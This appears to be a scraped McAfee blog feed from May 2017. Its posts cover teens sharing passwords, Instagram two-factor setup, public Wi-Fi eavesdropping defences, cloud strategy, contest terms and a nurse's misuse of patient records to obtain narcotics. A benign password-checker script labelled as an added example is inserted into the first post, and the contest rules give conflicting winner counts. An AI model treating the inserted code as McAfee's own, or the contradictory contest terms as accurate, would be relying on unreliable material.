For additional information about our product solutions, please visit our site: www.mcafee.com/pervasivedataprotection

What Else Kids Give Away When They Share Their Personal Passwords https://securingtomorrow.mcafee.com/consumer/family-safety/kids-give-away-share-passwords/ https://securingtomorrow.mcafee.com/consumer/family-safety/kids-give-away-share-passwords/#respond Tue, 09 May 2017 14:00:08 +0000 https://securingtomorrow.mcafee.com/?p=73419 Tweens and teens share clothes, secrets, and homework notes but there’s something else your kids may be sharing that isn’t so wise — their passwords. Password sharing has become a symbol of trust between friends and a sign of intimacy between significant others so much so that most teens aspire to password sharing as “relationship …

Tweens and teens share clothes, secrets, and homework notes but there’s something else your kids may be sharing that isn’t so wise — their passwords.

Password sharing has become a symbol of trust between friends and a sign of intimacy between significant others so much so that most teens aspire to password sharing as “relationship goals.”

Ask the dozen oft-surveyed teens in my world, and they happily explain that password sharing is “no big deal,” “fun,” and “what friends do.” Sharing also “proves to people you trust them” and is “the best way to keep tabs” on a significant other. 

But before you cringe at this seemingly naive behavior, wait. A recent World Password Day survey from McAfee reveals that 59% of people surveyed are comfortable sharing their passwords with other people. People share passwords with a spouse/partner (37%), family (23%), parents (23%), and even friends (9%) and colleagues (5%). The survey, which canvassed 3,000 people ages 18 and over, also exposes that 34% re-use the same or similar passwords on multiple accounts and that most people keep track of their passwords by writing them down and keeping them somewhere safe (37%). Another study from the Pew Institute echoes these recent findings, stating that 67% of Internet users in marriages or relationships have shared the passwords for one or more of their accounts with their partner.

But is sharing your password such a good idea? Arguments exist on either side.

Obvious reasons emerge in the headlines each week to remind us why we shouldn’t share passwords. The heartbreak publicly plays out in betrayal, revenge, cruel jokes, reputation damage, financial and identity theft, and, sadly, even sextortion.

There are also the larger reasons for not sharing passwords that likely aren’t even on your child’s radar, such as guarding the value and power of personal privacy and boundaries.

Family Talking Points

Boundaries matter. Keeping personal passwords private helps kids exercise healthy boundaries. Not all personal things need to be shared in a relationship, no matter how close two people may be. Maintaining independence in any relationship is a good thing. In the best-selling book Boundaries, Drs. Henry Cloud and John Townsend define a boundary as “a personal property line that marks those things for which we are responsible. In other words, boundaries define who we are and who we are not.”

Establishing boundaries helps children (and adults) understand and take responsibility for the things over which they have control. The boundaries we draw (such as privacy) begin to define us and what we believe about our values and standards. By forfeiting boundaries around the issue of privacy, kids can develop destructive behavior patterns in relationships.

Privacy is honoring. Allowing friends and significant others to maintain password privacy honors the personal space and possessions of another person. While kids may believe sharing passwords builds trust, a friend would not require you to give away your privacy to prove the depth of a relationship. Relationships require respect for a person’s material, emotional, and physical boundaries.

Pressure isn’t love. Peer pressure can come in many forms, even requests for a password. A simple request such as “hey, I need to Google something, what’s your lock screen password?” can make one person in a relationship vulnerable to material and emotional risks. A friendship or relationship can become bullish, controlling, and one in which the “monitored” party develops a need to please.

People change. As much as kids pledge undying loyalty to one another (“he’d never do anything to hurt my reputation!”), even the strongest bonds can surprisingly break, and the strength of the emotions that follow can be startling. Encourage kids to share some things but not all things, especially anything that can be used against them later. It’s just not wise.

No shortcuts to trust. Webster’s defines trust as “a firm belief in the reliability, truth, ability, or strength of someone or something.” To have a firm belief in anything or anyone is a process that takes time and experience. So it stands to reason that the act of sharing passwords does not instantly make a relationship trustworthy. In a relationship, a person’s consistent character over time is what builds trust. There are no shortcuts to trust.

Reclaiming privacy. This generation is often defined by the media as the generation that’s willing to share everything online. That opinion does not have to be your child’s reality. If your child (or you) constantly puts others’ needs first, has trouble saying no, and believes that setting healthy boundaries in a relationship could jeopardize it, then he or she may be a co-dependent person. Co-dependent people don’t honestly feel they have rights because they have given them all away. Slowly, over time, they have moved, if not eliminated, their personal boundaries. It’s never too late to change this picture and help your child learn how to establish healthy boundaries. Healthy boundaries include: having clear opinions and preferences and acting upon them, feeling safe and secure in relationships, being aware of personal choice in relationships, and being able to identify manipulative behaviors in others.

Password Reminders. Change your passwords every few months — start today. A strong password has all of the following characteristics:

  • It is at least ten characters in length
  • It doesn’t contain any word or words found in the dictionary
  • It mixes capital and lower-case letters
  • It contains special characters like numbers, punctuation marks, or symbols

Don’t get lazy with your passwords. The most common mistake consumers make is using the same password for all or most online accounts. So do this: Take an hour out of your day and change and document all of your passwords. Once you’ve beefed up your passwords, you can simplify the password process by using the True Key multi-factor authentication service (hey — it’s also free)!
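The four password characteristics listed above, plus the “don’t reuse one password everywhere” rule, as a small checker. This is an added example, not code from the original post or from McAfee; the word list is a constructed stand-in for a real dictionary file, and the account inventory in the test is constructed sample data.

```python
"""Check candidate passwords against the four rules from the post above:
at least ten characters, no dictionary word, mixed case, and at least one
digit, punctuation mark or symbol. Also flags passwords reused across accounts.

Added example, not part of the original post. DICTIONARY_WORDS is a
constructed mini word list; a real deployment would load a full dictionary.
"""
import string
from typing import Dict, Iterable, List

MIN_LENGTH = 10

# Constructed stand-in for a full dictionary / common-password list.
DICTIONARY_WORDS = {
    "password", "welcome", "summer", "dragon", "letmein", "monkey",
    "football", "qwerty", "sunshine", "princess",
}

# "Special characters like numbers, punctuation marks, or symbols".
SPECIAL_CHARS = set(string.digits + string.punctuation)


def contains_dictionary_word(password: str, words: Iterable[str] = DICTIONARY_WORDS) -> bool:
    """True if any dictionary word appears anywhere in the password (case-insensitive)."""
    lowered = password.lower()
    return any(word in lowered for word in words)


def check_password(password: str, words: Iterable[str] = DICTIONARY_WORDS) -> Dict[str, bool]:
    """Return a per-rule report: rule name -> True when the rule is satisfied."""
    has_lower = any(c.islower() for c in password)
    has_upper = any(c.isupper() for c in password)
    return {
        "min_length": len(password) >= MIN_LENGTH,
        "no_dictionary_word": not contains_dictionary_word(password, words),
        "mixed_case": has_lower and has_upper,
        "special_char": any(c in SPECIAL_CHARS for c in password),
    }


def failed_rules(password: str, words: Iterable[str] = DICTIONARY_WORDS) -> List[str]:
    """Names of the rules the password fails, in a stable order."""
    return [rule for rule, ok in check_password(password, words).items() if not ok]


def is_strong(password: str, words: Iterable[str] = DICTIONARY_WORDS) -> bool:
    """True only when every rule passes."""
    return not failed_rules(password, words)


def find_reused(accounts: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each password used by more than one account to the accounts sharing it.

    `accounts` is {account_name: password}, e.g. the inventory the post suggests
    you write down when changing all your passwords.
    """
    by_password: Dict[str, List[str]] = {}
    for account, password in accounts.items():
        by_password.setdefault(password, []).append(account)
    return {pw: sorted(names) for pw, names in by_password.items() if len(names) > 1}


if __name__ == "__main__":
    for candidate in ("Sunshine2017!", "xK9#mq2!vTr", "short1A!"):
        print(candidate, "->", "strong" if is_strong(candidate) else failed_rules(candidate))
```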

Want to have a little fun? McAfee has created the True Key Game to celebrate World Password Day. Share this game with your kids to help them learn more about password security.

~~~

A note on boundaries: It may help kids to identify a healthy boundary as an imaginary force field that separates their responsibilities and opinions from those of others. This force field separates what’s theirs from what’s others’; what they believe and value from what others believe and value. Imagining this force field more clearly may keep kids from feeling guilty for not conforming and free them up from taking negative comments personally.

As tough as it is to witness, your kids will experience heartbreak, betrayal, and broken trust. You can’t stop that. What you can stop is the depth of potential fallout by teaching the priceless value of privacy and keeping passwords under lock and key.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

Instagram Has Hopped Aboard the Two-Factor Authentication Train https://securingtomorrow.mcafee.com/consumer/mobile-security/instagram-two-factor-authentication/ https://securingtomorrow.mcafee.com/consumer/mobile-security/instagram-two-factor-authentication/#respond Tue, 09 May 2017 13:00:57 +0000 https://securingtomorrow.mcafee.com/?p=73671 With over 500 million users, Instagram has quickly become one of the top dogs of social media. Between the many features that combine the best of Facebook and Snapchat and a gorgeous, visual interface that lets you share your thoughts in over 140 characters, I understand why so many people are turning to the platform …

With over 500 million users, Instagram has quickly become one of the top dogs of social media. Between the many features that combine the best of Facebook and Snapchat and a gorgeous, visual interface that lets you share your thoughts in over 140 characters, I understand why so many people are turning to the platform to communicate with friends and family through daily posts, direct messages, and live video streaming. But, as the age-old saying goes, “with great power comes great responsibility.” As the platform gains more users every week and becomes a growing target for hackers, Instagram has a responsibility to its users to increase security measures to maintain user privacy.

After a long-awaited increase in account security, Instagram has finally released a two-factor authentication capability, so that users can up their level of personal security hygiene. Two-factor and multi-factor authentication are terms that have been thrown around a lot recently, with Twitter having added support for 2FA apps, and now Instagram introducing a system of its own into the login process. In case you need a refresher on the difference between the two (or need a quick overview of what they mean to begin with), here’s a quick guide. 

Two-Factor Authentication

Used to add a layer of security to online accounts, two-factor authentication asks for another piece of information after a user enters their password to log in (this is their first verification factor). The second factor can range from a question asking for something the user already knows (like a password, PIN, zip code, or mother’s maiden name), to a biometric verification like a fingerprint, to a confirmation number sent through an SMS message.

This is the most common type of verification, and I’m sure almost all of us have received single-use codes from some of our favorite apps and websites to confirm our identity. Though Twitter, LinkedIn, Facebook, and Instagram all offer 2FA logins, it’s not just social networking sites that offer the extra protection. Amazon, Dropbox, Apple, Microsoft, Google, and PayPal all allow users to switch on two-factor verification. This quick guide explains how to switch it on for all your favorite platforms.

Multi-factor Authentication

Two-factor authentication is a great option, of course, if the only other choice is to have single-factor authentication for your login. However, multi-factor authentication, or MFA, essentially protects your personal account information with more than two locks, and is always the best option when given a choice. Hackers find it much less appealing to try to hack into a personal account that’s been safeguarded with multi-factor authentication, because it won’t be simple. The True Key App is a great example of a system that uses MFA to ensure maximum security for your stored passwords.

Now, how can you turn on the new 2FA feature for your Instagram account? Here’s a quick, step-by-step guide to setup:

  • Open the Instagram app on your phone, then go to your profile page.
  • Click on the three dots in the upper-right corner, and go to Settings.
  • Scroll down to the “require security code” option, and select “Turn On”.
  • You’re all set, and so much more secure!

Setting up multi- or two-factor authentication systems on all accounts may seem like an extra or unnecessary step, but it’s quite the contrary. The extra step of checking for a verification code, providing a thumbprint, or answering an extra question or two before getting into your account is worth the protection against account hacks. In the meantime, organizations are working to make identity verification quick and easy (while equally secure), to minimize the “hassle” that can come with requiring multiple layers of authentication to gain access to your accounts. Until then—I think we can all agree it’s worth spending that extra minute or two to make sure our accounts are 100% locked down.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

How to protect your data when using public Wi-Fi https://securingtomorrow.mcafee.com/business/safeguard-data/how-to-protect-your-data-when-using-public-wi-fi/ Mon, 08 May 2017 20:39:32 +0000 https://securingtomorrow.mcafee.com/?p=73664 Many people are not aware of this, but Wi-Fi hotspots at Starbucks, Barnes & Noble or your local hotel that offers it as a complimentary service are not safe for confidential browsing, performing financial transactions or for viewing your emails. Public Wi-Fi does not offer encryption for individuals using the same password and hotspot. Also, …

Many people are not aware of this, but Wi-Fi hotspots at Starbucks, Barnes & Noble or your local hotel that offers it as a complimentary service are not safe for confidential browsing, performing financial transactions or for viewing your emails.

Public Wi-Fi does not offer encryption between individuals using the same password and hotspot. Also, your signals are broadcast across the immediate area. It is easy for someone else within your vicinity to eavesdrop on your communication. An unskilled hacker can intercept your signal using a phony hotspot or tampering software that can be found on a search engine.

The first task of a hacker is to get on the same network as the potential victim, and on a public Wi-Fi network that task is trivial because they have the password. It does not matter if a network password is given out by the cashier or printed in your hotel room’s welcome packet; once public, your security is compromised.

Many public Wi-Fi connections use Wi-Fi Protected Access 2 (WPA2), a secure protocol for encrypting traffic between the wireless AP and the client. Many people think having this encryption secures their traffic, but they do not realize anyone who has the password can still snoop on the packets that traverse over the network.

Attackers can obtain a lot of information when eavesdropping on your Wi-Fi network connection. They can capture your passwords and content for sites that you sign into that do not require Secure Sockets Layer (SSL) encryption. Also, they can easily capture your email and file transfers that do not have any encryption applied. An attacker can also capture voice communication across Wi-Fi and replay it.

Software used to eavesdrop can be easily obtained on the internet and does not require a lot of technical skills to operate. This helps contribute to public Wi-Fi hotspots being more popular attack targets than some personal or private networks.

4 actions to secure your data on a public Wi-Fi

  • The best way to secure your traffic while using public Wi-Fi is to use a virtual private network (VPN). When connected, all your internet traffic is sent from your computer through an encrypted tunnel to the provider’s endpoint. The traffic is secure from any local eavesdroppers on the public Wi-Fi network. These public VPN services typically cost only $5-$20 per month. There is even software available on mobile phones that will enable a VPN to start automatically when connecting to a public Wi-Fi hotspot. The primary complaint when using a VPN is it can slow down your connection speed by 25 to 50 percent.
  • If you do not have a VPN configured, make sure that each time you connect to a website over a public Wi-Fi your session is encrypted. In your URL field, you should see HTTPS and not HTTP. You also want to make sure the entire session remains encrypted while you are browsing. There are some sites that will encrypt your login and then later during the session will send you to an HTTP connection, which will make you vulnerable to a hijacking attack. There are some sites that will give you an option to encrypt your entire session. It is best to encrypt the entire session.
  • Never perform a file transfer protocol (FTP) transaction over a public Wi-Fi. Also avoid using any other protocols that transfer data in an unsecured manner unless you have a VPN established. You can consider using secure FTP, which would encrypt your session. Also, for email client programs, you need to verify that SSL is being used for IMAP, POP3 and SMTP server connections.
  • A very common attack involves a hacker setting up a public Wi-Fi hotspot of their own near the site of the public Wi-Fi. It will likely have a similar name to the legitimate one the business uses. The problem is that all your browsing activity is being routed through the attacker’s network, which would enable them to monitor the traffic. To avoid this, always verify the exact name of the hotspot’s SSID from the business hosting it. Also, make sure you do not see two access points with the same name.

Wi-Fi eavesdropping is growing as an attack vector because more public Wi-Fi hotspots are being installed. Many cities, such as San Francisco and New York, offer free Wi-Fi at various public locations, and more people are taking advantage of it.

The problem is that it is very easy for novice hackers to obtain personal information from these public hotspots. Users should consider using a VPN when connecting to a public Wi-Fi hotspot, because the benefits of this protection far outweigh the cost of being compromised.

This article was written by Mark Dargin from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

CIOs: You need to have the cloud talk with your staff https://securingtomorrow.mcafee.com/executive-perspectives/cios-need-cloud-talk-staff/ https://securingtomorrow.mcafee.com/executive-perspectives/cios-need-cloud-talk-staff/#respond Mon, 08 May 2017 16:15:23 +0000 https://securingtomorrow.mcafee.com/?p=73656 CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing. …

CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing.

Cloud First strategies are predominantly driven from the top down, per McAfee’s 2017 cloud adoption and security report. However, for many of the organizations involved in the study, there appears to be a slight disconnect between the C-suite and staff. Overall, C-level executives, such as CIOs, CSOs, and CISOs, displayed a more positive attitude towards cloud-based operations than the non-executive respondents.

Within your organization, it is important to uncover any gaps in perception and determine what is causing them. Are the reasons for a Cloud First strategy not getting clearly communicated down the chain? Are your staff seeing operational issues that are not making it to your office? Or is your staff concerned that cloud adoption is putting their jobs at risk?

The McAfee 2017 cloud study provides some valuable clues and discussion points for your staff meeting. Based on the survey results, 92% of execs stated that they are following a Cloud First strategy, but only 80% of staff agreed. There were also significant gaps in the number and types of cloud services in use, amount of sensitive data stored in the cloud, and plans for future cloud investments. An organization-wide inventory of cloud services in use, data types and locations, and budgets would be an excellent way to start the meeting. The results of this inventory will likely surprise most people in the room, and form the foundation for a discussion of operational and staffing concerns.

According to the survey, the biggest gaps in operational concerns between staff and executives relate to costs, compliance, unauthorized access, and Shadow IT. Staff were more concerned about costs than executives, which may be directly related to the lack of information about budget plans mentioned above. However, staff were also more concerned about unauthorized access to sensitive data and their ability to maintain compliance with regulations than the execs. These concerns should be the focus of a deep dive across the organization, to identify whether there are significant gaps in security and privacy controls. At the same time, executives were more concerned about Shadow IT than staff. When Shadow IT apps are found, staff were more likely to favor blocking access to unauthorized applications, while execs preferred data loss prevention tools. Depending on the results of your discussion, clear communication throughout the organization about the risks and consequences of Shadow IT appears to be needed.

Finally, staff may feel that they lack the necessary job skills for a Cloud-First IT department. Over half of the executives reported that they have slowed their cloud adoption due to a skills shortage, and almost a third reported that they are continuing despite a skills shortage. However, the execs ranked this concern lower than staff did, which may be inadvertently sending the message down the chain that staffing changes are coming. Based on earlier research from McAfee, it is easier and more effective to invest in security training for existing staff than to find and hire experienced security professionals.

The transformation to cloud services is having a significant impact on the efficiency and effectiveness of organizations of all sizes, and the IT department is probably impacted more than most. Based on the results of this study, there are some small but possibly significant gaps between C-level executives and their staff, that should be addressed before they impact the organization’s security posture.

For more details on cloud adoption and security, download the 2017 McAfee cloud report, Building Trust in a Cloudy Sky.

Can You Spot the “Misaligned Lie?” Contest Terms and Conditions https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/ https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/#respond Mon, 08 May 2017 15:00:42 +0000 https://securingtomorrow.mcafee.com/?p=73623 Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card! From May 8th-11th we’ll share “Two Truths …

Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card!

From May 8th-11th we’ll share “Two Truths and a Lie” posts on @McAfee. Your job is to reply to us with which answer you think is the lie. Once you tweet us your correct answer, you’ll be automatically entered to win a $100 Amazon Gift card! After the contest, we will select 4 winners who tweeted the correct answer, and notify them via direct message.

So head over to twitter to catch the “Misaligned Lie” (and if you haven’t already read our Misaligned Incentives Report and study up)!

For full contest details please see the Terms and Conditions below:

 Misaligned Incentives “Two Truths and a Lie” Contest

  1.   How to enter:

No purchase necessary. A purchase will not increase your chances of winning. McAfee Misaligned Incentives “Two Truths and a Lie” Contest Terms and Conditions will be conducted during one week, each day being the start of a new entry period. All entries for each day of the Misaligned Incentives “Two Truths and a Lie” Contest must be received during the time period allotted for that Misaligned Incentives “Two Truths and a Lie” Contest. Pacific Daylight Time shall control the Misaligned Incentives “Two Truths and a Lie” Contest. One winner will be chosen after the four days of the Misaligned Incentives “Two Truths and a Lie” Contest. The Misaligned Incentives “Two Truths and a Lie” Contest is as follows:

Misaligned Incentives “Two Truths and a Lie” Contest – One Week 4 Winners

  • Monday, May 8th 9am –  Friday, May 12th 6pm PST
    • 5 winners announced Monday, May 15th @ 3pm PST

On each of the days listed above, there will be 1 tweet from @McAfee with a sharecard for participants to reply to.

For each Misaligned Incentives “Two Truths and a Lie” Contest, participants must complete the following steps during the time allotted for the Misaligned Incentives “Two Truths and a Lie” Contest:

  1. Reply to the @McAfee or Social Reply Contest tweet with the correct “lie.”
  2. Your answer must be in the form of a reply to @McAfee in order to be successfully submitted.

Four winners will be chosen for the Misaligned Incentives “Two Truths and a Lie” Contest from the viable pool of entries that replied to the correct tweet. McAfee (“Sponsor”) and its McAfee social team will randomly choose a winner from the eligible and correct entries. The winners of each day will be announced by 3:00pm PDT on Monday, May 15th on the @McAfee twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per contest. Participants are only eligible to win one day of the five days.

  2.   Eligibility:

The Misaligned Incentives “Two Truths and a Lie” Contest is open to all people who are 18 years of age or older on the date the Misaligned Incentives “Two Truths and a Lie” Contest begins and live in a jurisdiction where this prize and Misaligned Incentives “Two Truths and a Lie” Contest are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection: 

Five (5) total winners, will be selected from the eligible entries received during each of the Misaligned Incentives “Two Truths and a Lie” Contest periods. By participating, entrants agree to be bound by the Official Misaligned Incentives “Two Truths and a Lie” Contest and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com at or around 3:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1. Prizes:

The prize for each Misaligned Incentives “Two Truths and a Lie” Contest is a $100 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1. General conditions:

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned Incentives “Two Truths and a Lie” Contest, or by any technical or human error, which may occur in the processing of the Misaligned Incentives “Two Truths and a Lie” Contest entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Misaligned Incentives “Two Truths and a Lie” Contest, any prize won, any misuse or malfunction of any prize awarded, participation in any Misaligned Incentives “Two Truths and a Lie” Contest-related activity, or participation in the Misaligned Incentives “Two Truths and a Lie” Contest. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Contest, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Contest or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  1. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Contest constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Contest, you consent to being contacted by Sponsor for any purpose in connection with this Contest.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Misaligned Incentives “Two Truths and a Lie” Contest rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Misaligned Incentives “Two Truths and a Lie” Contest.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law &  Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy:

Personal information obtained in connection with this prize Misaligned Incentives “Two Truths and a Lie” Contest will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 12th 2017 and before May 11th 2018 to the address listed below, Attn: Misaligned Incentives “Two Truths and a Lie” Contest. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Margie Easter. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Contest and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054 USA


The post Can You Spot the “Misaligned Lie?” Contest Terms and Conditions appeared first on McAfee Blogs.

Misaligned Incentives #IncentiveQuiz https://securingtomorrow.mcafee.com/languages/german/missverhaltnis-der-anreize-incentivequiz/ https://securingtomorrow.mcafee.com/languages/german/missverhaltnis-der-anreize-incentivequiz/#respond Fri, 05 May 2017 09:00:45 +0000 https://securingtomorrow.mcafee.com/?p=73607 The cyber-security battle between the notorious Black Hats and the White Hats on the defenders’ side resembles a game of cat and mouse. At the moment the Black Hats always seem to be one step ahead of the White Hats, but the field is constantly in motion. So what motivates the two sides? Test your knowledge with our latest #IncentiveQuiz …

The cyber-security battle between the notorious Black Hats and the White Hats on the defenders’ side resembles a game of cat and mouse. At the moment the Black Hats always seem to be one step ahead of the White Hats, but the field is constantly in motion. So what motivates the two sides? Test your knowledge of the incentives for Black Hats and White Hats with our latest #IncentiveQuiz. Find out what motivates Black Hats to commit crimes and which shortcomings hold White Hats back.


The post Misaligned Incentives #IncentiveQuiz appeared first on McAfee Blogs.

Misaligned Incentives #IncentiveQuiz https://securingtomorrow.mcafee.com/languages/francais/decalage-des-incitants-incentivequiz/ https://securingtomorrow.mcafee.com/languages/francais/decalage-des-incitants-incentivequiz/#respond Fri, 05 May 2017 09:00:17 +0000 https://securingtomorrow.mcafee.com/?p=73587 Between the notorious Black Hats and the ethical, committed White Hats, the fight against cybercrime can sometimes resemble a game of cat and mouse. Today, malicious hackers always seem to be one step ahead of the ethical hacking experts. Attacks and counter-attacks follow one another at a relentless pace …

Between the notorious Black Hats and the ethical, committed White Hats, the fight against cybercrime can sometimes resemble a game of cat and mouse. Today, malicious hackers always seem to be one step ahead of the ethical hacking experts. Attacks and counter-attacks follow one another at a relentless pace. But what motivates each side? Test your knowledge of the motivations of Black Hats and White Hats with our latest #IncentiveQuiz. Discover what drives malicious hackers to crime and the incentives that ethical hackers lack.


The post Misaligned Incentives #IncentiveQuiz appeared first on McAfee Blogs.

Need a fix? Steal patient data https://securingtomorrow.mcafee.com/business/safeguard-data/need-a-fix-steal-patient-data/ Thu, 04 May 2017 22:41:46 +0000 https://securingtomorrow.mcafee.com/?p=73616 The health care sector continues to be a sieve when it comes to protecting patients’ Personally Identifiable Information (PII) and Protected Health Information (PHI). Often, the data breach involving PII or PHI is discovered by a third party, which leaves the doctor, dentist, hospital or pharmacy dumped into sleuth mode. This was not the case …

The health care sector continues to be a sieve when it comes to protecting patients’ Personally Identifiable Information (PII) and Protected Health Information (PHI). Often, the data breach involving PII or PHI is discovered by a third party, which leaves the doctor, dentist, hospital or pharmacy dumped into sleuth mode.

This was not the case with Canadian medical provider William Osler Health Systems (Osler). According to Canadian news outlet 680news, in January Osler launched an internal investigation into patient information being used to illicitly acquire a prescription narcotic, Percocet. Osler’s internal narcotic stores of Percocet were inexplicably being depleted. What is unclear is whether local pharmacies also reported an influx of prescriptions for Percocet being filled, 680news reported. Osler has not revealed the number of individuals affected. A call for clarification to Osler was not returned.

CTV-News reported that the Osler investigation pointed to one of its registered nurses, Catharina Demme, who Osler has confirmed had accessed the PHI and PII of patients. Various media reports cite individuals who were affected despite not using Osler’s services in several years. Therefore, it is logical to conclude the information being accessed by Demme was both current and historical PII/PHI records.

Peel Police’s late-April press release states, “Catharina Demme gained access to patient names from a list on a computer database in order to access narcotics for non-hospital related use. Demme only had limited access to patient information.” Demme, who was arrested on March 30, has been charged with “Breach of Trust and Theft under $5,000.” Peel Regional Police (Canada) Constable Mark Fischer, commented to CBC, “She (Demme) was taking a quantity of drugs, in this incident mostly Percocet, using different names to get this quantity of drugs.”

Trusted insider breaks trust

Demme, a registered nurse, had access to the hospital patient record systems at Osler. Osler publicly declares that it has logging, auditing and monitoring policies and procedures in place, including communication of these controls to all “authorized users.”

